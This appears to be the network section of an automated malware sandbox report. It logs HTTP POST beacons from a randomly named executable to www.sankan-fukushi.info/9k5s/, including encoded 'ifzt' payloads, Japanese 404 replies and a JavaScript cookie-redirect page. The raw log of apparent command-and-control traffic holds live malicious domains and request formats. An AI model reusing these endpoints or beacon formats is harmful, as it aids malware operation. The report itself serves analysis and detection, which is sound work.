                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                                                                                                Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("06dcab5f8942e5ac4ac00564a9fea9bf");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/vvzz/?ifzt=cUYTrm/9WoUGLtXnEfHvigyvVWYscXEqz9Hmi7WWzB+Eo/kiz1zVNsrH4IZXq93JBsPKcKHGWPOW5+N9njVZg9AZ40ltQReYzymzYn/PGSkLTDv/+fBeI5c=&qX=qP0hoZO0bjg4&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                41192.168.2.450048163.44.185.183803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:45:20.884491920 CET801OUTPOST /9k5s/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.sankan-fukushi.info
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.sankan-fukushi.info
                                                                                                                                                Referer: http://www.sankan-fukushi.info/9k5s/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 47 4a 56 42 79 45 71 6c 5a 58 30 2f 56 55 79 4d 6e 64 79 33 67 61 45 4d 56 4e 69 4e 31 7a 31 35 7a 69 76 4a 66 57 69 4c 6d 66 65 50 56 73 58 48 63 77 44 64 44 50 43 66 4d 41 39 6f 54 47 38 74 69 36 49 6a 31 68 74 79 4e 45 65 51 6a 6e 72 31 6b 53 31 6e 45 31 6a 45 70 58 68 6d 39 49 48 48 68 4b 75 53 72 69 47 70 33 54 5a 41 57 4b 62 37 2f 42 31 5a 78 6c 39 5a 50 70 6d 35 64 4e 32 4a 46 63 77 44 38 41 64 76 75 6c 56 52 30 74 64 35 64 4a 71 55 42 5a 6e 4a 4c 47 31 61 44 50 71 61 43 54 42 6e 52 34 31 47 74 4f 49 59 36 31 38 6e 49 4d 7a 6f 49 6e 47 7a 56 6e 41 2f 62 56 62 61 42 77 3d 3d
                                                                                                                                                Data Ascii: ifzt=GJVByEqlZX0/VUyMndy3gaEMVNiN1z15zivJfWiLmfePVsXHcwDdDPCfMA9oTG8ti6Ij1htyNEeQjnr1kS1nE1jEpXhm9IHHhKuSriGp3TZAWKb7/B1Zxl9ZPpm5dN2JFcwD8AdvulVR0td5dJqUBZnJLG1aDPqaCTBnR41GtOIY618nIMzoInGzVnA/bVbaBw==
                                                                                                                                                Nov 25, 2024 09:45:22.341161966 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:45:22 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 19268
                                                                                                                                                Connection: close
                                                                                                                                                Server: Apache
                                                                                                                                                Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                                                                                                                Nov 25, 2024 09:45:22.341178894 CET231INData Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f
                                                                                                                                                Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -m
                                                                                                                                                Nov 25, 2024 09:45:22.341305017 CET1236INData Raw: 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74
                                                                                                                                                Data Ascii: s-flex-pack: center; justify-content: center; -webkit-align-items: center; -ms-flex-align: center; align-items: center; -webkit-flex-wrap: wrap; -ms-flex-wrap: wrap; flex-wr
                                                                                                                                                Nov 25, 2024 09:45:22.341316938 CET1236INData Raw: 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 63 33 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 6f 72 64 65 72 3a 20 31 3b
                                                                                                                                                Data Ascii: e; border-radius: 6px; background: #fc3; -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error-page__information-balloon::after { position: absolute; z-index: 1;
                                                                                                                                                Nov 25, 2024 09:45:22.341327906 CET1236INData Raw: 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 35 70 78
                                                                                                                                                Data Ascii: .lol-error-page__ad-banner { text-align:center; margin: 15px auto 20px; } .lol-error-page__ad-banner-holizontal { width: 300px; height: auto; margin: auto; } @media screen a
                                                                                                                                                Nov 25, 2024 09:45:22.341339111 CET1236INData Raw: 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 22 20 68 65 69 67 68 74 3d 22 31 34 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 35 20 31 34 38 22 3e 3c 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66
                                                                                                                                                Data Ascii: /svg" width="100" height="142" viewBox="0 0 105 148"><g fill="none"><path fill="#f60" d="M87.7 52.376c-.742-3.291-1.243-6.631-1.5-9.994.943-3.251 4.968-18.858-3.232-30.342-5.627-7.931-15.639-12.04-29.9-12.04h-.329c-14.1 0-24.317 3.988-30.153 1
                                                                                                                                                Nov 25, 2024 09:45:22.341351032 CET1236INData Raw: 36 20 31 2e 31 35 33 2e 35 39 34 20 31 2e 38 2e 35 35 37 20 31 2e 34 34 31 2e 33 31 35 20 32 2e 39 31 38 2d 2e 33 35 32 20 33 2e 36 33 36 2d 31 2e 36 34 31 2e 38 35 31 2d 31 2e 39 34 31 20 31 2e 32 39 33 2d 34 2e 30 33 37 20 31 2e 33 2d 36 2e 31
                                                                                                                                                Data Ascii: 6 1.153.594 1.8.557 1.441.315 2.918-.352 3.636-1.641.851-1.941 1.293-4.037 1.3-6.156.258-2.084.09-4.199-.494-6.216-.544-1.376-1.926-2.233-3.4-2.107l-.402-.015z"/><path fill="#f60" d="M51.976 102.7c-.463 0-.908-.179-1.242-.5l-11.044-10.527c-.40
                                                                                                                                                Nov 25, 2024 09:45:22.341363907 CET1084INData Raw: 2e 36 32 31 2d 31 2e 36 37 31 2d 2e 38 32 34 2d 31 2e 39 33 32 2d 31 2e 32 34 36 2d 34 2e 30 31 31 2d 31 2e 32 34 31 2d 36 2e 31 31 31 2d 2e 33 38 39 2d 36 2e 37 38 38 20 31 2e 30 33 33 2d 38 2e 31 32 37 20 33 2e 39 36 36 2d 38 2e 32 39 33 68 2e
                                                                                                                                                Data Ascii: .621-1.671-.824-1.932-1.246-4.011-1.241-6.111-.389-6.788 1.033-8.127 3.966-8.293h.4c.392-.013.783.049 1.152.181-.185 1.468-.28 2.946-.284 4.425-.01 3.674.495 7.332 1.5 10.866l-.072.061zm26.365 19.475h-.15c-10.071 0-18.9-8.293-22.447-19.566.168
                                                                                                                                                Nov 25, 2024 09:45:22.341376066 CET1236INData Raw: 32 2e 35 2d 31 32 2e 37 39 33 2d 31 32 2e 32 32 35 2e 34 30 37 2d 32 36 2e 39 33 35 2d 32 2e 36 39 34 2d 33 34 2e 33 34 32 2d 31 30 2e 34 33 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 36 30 22 20 64 3d 22 4d 33 39 2e 32 35 36 20 34 34
                                                                                                                                                Data Ascii: 2.5-12.793-12.225.407-26.935-2.694-34.342-10.43z"/><path fill="#f60" d="M39.256 44.625c-1.8 0-3.2 1.776-3.217 4.064-.017 2.288 1.392 4.079 3.172 4.094 1.78.015 3.2-1.776 3.217-4.064.017-2.288-1.376-4.079-3.172-4.094zm26.2.12c-1.8 0-3.2 1.776-3
                                                                                                                                                Nov 25, 2024 09:45:22.341391087 CET1236INData Raw: 37 2e 32 35 34 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 36 30 22 20 64 3d 22 4d 35 32 2e 33 36 35 20 36 30 2e 37 31 34 63 2d 2e 35 34 38 2e 30 30 31 2d 31 2e 30 36 36 2d 2e 32 34 38 2d 31 2e 34 30 37 2d 2e 36 37 37 6c 2d 32 2e 33 31 39
                                                                                                                                                Data Ascii: 7.254"/><path fill="#f60" d="M52.365 60.714c-.548.001-1.066-.248-1.407-.677l-2.319-2.92c-.455-.579-.514-1.377-.15-2.017 1.141-1.931 1.865-4.079 2.125-6.306-.016-.481.16-.949.489-1.3.494-.533 1.264-.71 1.94-.445.677.265 1.122.918 1.122 1.645-.1
                                                                                                                                                Nov 25, 2024 09:45:22.460918903 CET1236INData Raw: 6c 2d 2e 32 30 38 2e 33 63 2d 2e 33 37 39 2e 35 32 33 2d 2e 37 33 31 20 31 2d 31 2e 30 38 34 20 31 2e 34 34 38 6c 2d 2e 34 34 37 2e 35 34 32 63 2d 2e 33 33 35 2e 34 31 31 2d 2e 36 37 34 2e 37 38 34 2d 31 20 31 2e 31 34 32 2d 2e 37 34 2e 37 38 39
                                                                                                                                                Data Ascii: l-.208.3c-.379.523-.731 1-1.084 1.448l-.447.542c-.335.411-.674.784-1 1.142-.74.789-1.536 1.524-2.381 2.2l-.273.218-9.572-.005zm5-10.2c-.405-.001-.801.124-1.133.356-.683.482-1.001 1.333-.8 2.145.023.126.056.25.1.371.312.743 1.041 1.224 1.846 1.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                42192.168.2.450049163.44.185.183803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:45:23.555538893 CET821OUTPOST /9k5s/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.sankan-fukushi.info
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.sankan-fukushi.info
                                                                                                                                                Referer: http://www.sankan-fukushi.info/9k5s/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 47 4a 56 42 79 45 71 6c 5a 58 30 2f 55 31 43 4d 6f 65 61 33 78 4b 45 4c 5a 74 69 4e 37 54 31 39 7a 69 6a 4a 66 56 75 62 6c 71 32 50 56 4e 6e 48 4f 42 44 64 51 2f 43 66 56 77 39 74 4d 32 38 6d 69 39 42 57 31 67 42 79 4e 48 69 51 6a 6a 76 31 6b 68 64 6d 46 6c 6a 4b 79 6e 68 34 35 49 48 48 68 4b 75 53 72 69 43 44 33 58 31 41 57 2f 4c 37 2b 67 31 65 75 56 39 57 65 70 6d 35 5a 4e 32 4e 46 63 78 35 38 42 51 30 75 6e 64 52 30 6f 35 35 63 59 71 58 61 70 6e 50 46 6d 31 52 53 63 4c 6c 59 77 77 58 62 5a 64 6d 69 50 4d 48 79 54 78 39 5a 39 53 2f 61 6e 69 41 49 67 4a 4c 57 57 6d 54 61 77 65 4c 65 2f 75 43 47 52 67 41 79 34 59 36 35 65 79 69 59 41 63 3d
                                                                                                                                                Data Ascii: ifzt=GJVByEqlZX0/U1CMoea3xKELZtiN7T19zijJfVublq2PVNnHOBDdQ/CfVw9tM28mi9BW1gByNHiQjjv1khdmFljKynh45IHHhKuSriCD3X1AW/L7+g1euV9Wepm5ZN2NFcx58BQ0undR0o55cYqXapnPFm1RScLlYwwXbZdmiPMHyTx9Z9S/aniAIgJLWWmTaweLe/uCGRgAy4Y65eyiYAc=
                                                                                                                                                Nov 25, 2024 09:45:24.967727900 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:45:24 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 19268
                                                                                                                                                Connection: close
                                                                                                                                                Server: Apache
                                                                                                                                                Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                                                                                                                Nov 25, 2024 09:45:24.967768908 CET231INData Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f
                                                                                                                                                Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -m
                                                                                                                                                Nov 25, 2024 09:45:24.967780113 CET1236INData Raw: 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74
                                                                                                                                                Data Ascii: s-flex-pack: center; justify-content: center; -webkit-align-items: center; -ms-flex-align: center; align-items: center; -webkit-flex-wrap: wrap; -ms-flex-wrap: wrap; flex-wr
                                                                                                                                                Nov 25, 2024 09:45:24.967899084 CET1236INData Raw: 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 63 33 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 6f 72 64 65 72 3a 20 31 3b
                                                                                                                                                Data Ascii: e; border-radius: 6px; background: #fc3; -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error-page__information-balloon::after { position: absolute; z-index: 1;
                                                                                                                                                Nov 25, 2024 09:45:24.967930079 CET1236INData Raw: 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 35 70 78
                                                                                                                                                Data Ascii: .lol-error-page__ad-banner { text-align:center; margin: 15px auto 20px; } .lol-error-page__ad-banner-holizontal { width: 300px; height: auto; margin: auto; } @media screen a
                                                                                                                                                Nov 25, 2024 09:45:24.967943907 CET1236INData Raw: 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 22 20 68 65 69 67 68 74 3d 22 31 34 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 35 20 31 34 38 22 3e 3c 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66
                                                                                                                                                Data Ascii: /svg" width="100" height="142" viewBox="0 0 105 148"><g fill="none"><path fill="#f60" d="M87.7 52.376c-.742-3.291-1.243-6.631-1.5-9.994.943-3.251 4.968-18.858-3.232-30.342-5.627-7.931-15.639-12.04-29.9-12.04h-.329c-14.1 0-24.317 3.988-30.153 1
                                                                                                                                                Nov 25, 2024 09:45:24.967958927 CET1236INData Raw: 36 20 31 2e 31 35 33 2e 35 39 34 20 31 2e 38 2e 35 35 37 20 31 2e 34 34 31 2e 33 31 35 20 32 2e 39 31 38 2d 2e 33 35 32 20 33 2e 36 33 36 2d 31 2e 36 34 31 2e 38 35 31 2d 31 2e 39 34 31 20 31 2e 32 39 33 2d 34 2e 30 33 37 20 31 2e 33 2d 36 2e 31
                                                                                                                                                Data Ascii: 6 1.153.594 1.8.557 1.441.315 2.918-.352 3.636-1.641.851-1.941 1.293-4.037 1.3-6.156.258-2.084.09-4.199-.494-6.216-.544-1.376-1.926-2.233-3.4-2.107l-.402-.015z"/><path fill="#f60" d="M51.976 102.7c-.463 0-.908-.179-1.242-.5l-11.044-10.527c-.40
                                                                                                                                                Nov 25, 2024 09:45:24.967994928 CET1072INData Raw: 2e 36 32 31 2d 31 2e 36 37 31 2d 2e 38 32 34 2d 31 2e 39 33 32 2d 31 2e 32 34 36 2d 34 2e 30 31 31 2d 31 2e 32 34 31 2d 36 2e 31 31 31 2d 2e 33 38 39 2d 36 2e 37 38 38 20 31 2e 30 33 33 2d 38 2e 31 32 37 20 33 2e 39 36 36 2d 38 2e 32 39 33 68 2e
                                                                                                                                                Data Ascii: .621-1.671-.824-1.932-1.246-4.011-1.241-6.111-.389-6.788 1.033-8.127 3.966-8.293h.4c.392-.013.783.049 1.152.181-.185 1.468-.28 2.946-.284 4.425-.01 3.674.495 7.332 1.5 10.866l-.072.061zm26.365 19.475h-.15c-10.071 0-18.9-8.293-22.447-19.566.168
                                                                                                                                                Nov 25, 2024 09:45:24.968008041 CET1236INData Raw: 2d 2e 38 33 36 2d 38 2e 37 33 34 2d 32 2e 35 2d 31 32 2e 37 39 33 2d 31 32 2e 32 32 35 2e 34 30 37 2d 32 36 2e 39 33 35 2d 32 2e 36 39 34 2d 33 34 2e 33 34 32 2d 31 30 2e 34 33 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 36 30 22 20 64
                                                                                                                                                Data Ascii: -.836-8.734-2.5-12.793-12.225.407-26.935-2.694-34.342-10.43z"/><path fill="#f60" d="M39.256 44.625c-1.8 0-3.2 1.776-3.217 4.064-.017 2.288 1.392 4.079 3.172 4.094 1.78.015 3.2-1.776 3.217-4.064.017-2.288-1.376-4.079-3.172-4.094zm26.2.12c-1.8 0
                                                                                                                                                Nov 25, 2024 09:45:24.968019962 CET1236INData Raw: 34 2e 32 35 39 20 32 2e 33 39 34 2d 37 2e 32 35 34 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 36 30 22 20 64 3d 22 4d 35 32 2e 33 36 35 20 36 30 2e 37 31 34 63 2d 2e 35 34 38 2e 30 30 31 2d 31 2e 30 36 36 2d 2e 32 34 38 2d 31 2e 34 30 37
                                                                                                                                                Data Ascii: 4.259 2.394-7.254"/><path fill="#f60" d="M52.365 60.714c-.548.001-1.066-.248-1.407-.677l-2.319-2.92c-.455-.579-.514-1.377-.15-2.017 1.141-1.931 1.865-4.079 2.125-6.306-.016-.481.16-.949.489-1.3.494-.533 1.264-.71 1.94-.445.677.265 1.122.918 1.
                                                                                                                                                Nov 25, 2024 09:45:25.087276936 CET1236INData Raw: 2d 31 2e 30 39 33 20 31 2e 36 35 37 6c 2d 2e 32 30 38 2e 33 63 2d 2e 33 37 39 2e 35 32 33 2d 2e 37 33 31 20 31 2d 31 2e 30 38 34 20 31 2e 34 34 38 6c 2d 2e 34 34 37 2e 35 34 32 63 2d 2e 33 33 35 2e 34 31 31 2d 2e 36 37 34 2e 37 38 34 2d 31 20 31
                                                                                                                                                Data Ascii: -1.093 1.657l-.208.3c-.379.523-.731 1-1.084 1.448l-.447.542c-.335.411-.674.784-1 1.142-.74.789-1.536 1.524-2.381 2.2l-.273.218-9.572-.005zm5-10.2c-.405-.001-.801.124-1.133.356-.683.482-1.001 1.333-.8 2.145.023.126.056.25.1.371.312.743 1.041 1.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                43192.168.2.450050163.44.185.183803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:45:26.212435961 CET10903OUTPOST /9k5s/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.sankan-fukushi.info
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.sankan-fukushi.info
                                                                                                                                                Referer: http://www.sankan-fukushi.info/9k5s/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
